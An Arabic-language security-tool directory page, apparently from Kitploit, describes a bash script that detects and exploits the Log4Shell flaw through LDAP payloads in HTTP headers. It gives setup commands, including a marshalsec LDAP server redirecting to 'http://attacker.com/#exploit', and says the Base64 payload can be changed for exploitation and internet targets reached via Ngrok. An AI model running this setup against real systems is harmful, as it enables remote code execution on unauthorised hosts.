Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4j-Scanner-Exploit — سكربت بلغة باش يمكن من تحديد ثغرة Log4j CVE-2021-44228 عن بعد. | Kitploit
أدوات/GitHubGitHub/julian911015/log4j-scanner-exploit
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

سكربت بلغة باش يمكن من تحديد ثغرة Log4j CVE-2021-44228 عن بعد.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4Shell-Scanner-Exploit

سكربت bash يتيح تحديد و/أو استغلال ثغرة Log4shell عن بُعد. تقوم هذه الأداة بإجراء اختبارات مختلفة باستخدام حمولات LDAP ورؤوس X-Api-Version وUser-Agent وX-Forwarded-For.

استخدم هذا السكربت دائمًا بعد الحصول على إذن مسبق من مالك الخدمة/التطبيق الذي يتم تدقيقه.

التبعيات:

  1. سننشئ خادم LDAP مُعد مسبقًا من GitHub: https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. نقوم بتفعيل خادم HTTP python3 -m http.server 8080

  2. يجب تثبيت Java #sudo apt install default-jre

  3. يجب تثبيت Curl #sudo apt-get install curl

مثال الاستخدام:

أدخل المعاملات التالية:

  • قائمة بعناوين URL المراد فحصها
  • عنوان IP لخادم LDAP
  • منفذ خادم LDAP
  • عنوان IP لخادم HTTP
  • منفذ خادم HTTP

#مثال فحص تطبيق على شبكة داخلية:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

#مثال فحص تطبيق على الإنترنت:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

توضيحات:

  • الحمولة المستخدمة ترسل أمر "ifconfig" إلى الأجهزة التي تم تحديدها على أنها قابلة للاستغلال، وهذه الحمولة مشفرة بصيغة Base64 ويمكن تعديلها لتنفيذ مرحلة الاستغلال في اختبار الاختراق.
  • إذا رغبت في استخدام الأداة على خدمات الإنترنت، يمكنك تشغيل خدمة Ngrok تقوم بعمل إعادة توجيه المنافذ إلى المنفذ المحلي لخادم LDAP.
  • استخدم هذا السكربت دائمًا بعد الحصول على إذن مسبق من مالك الخدمة/التطبيق الذي تم تحليله.
تنزيل الأداة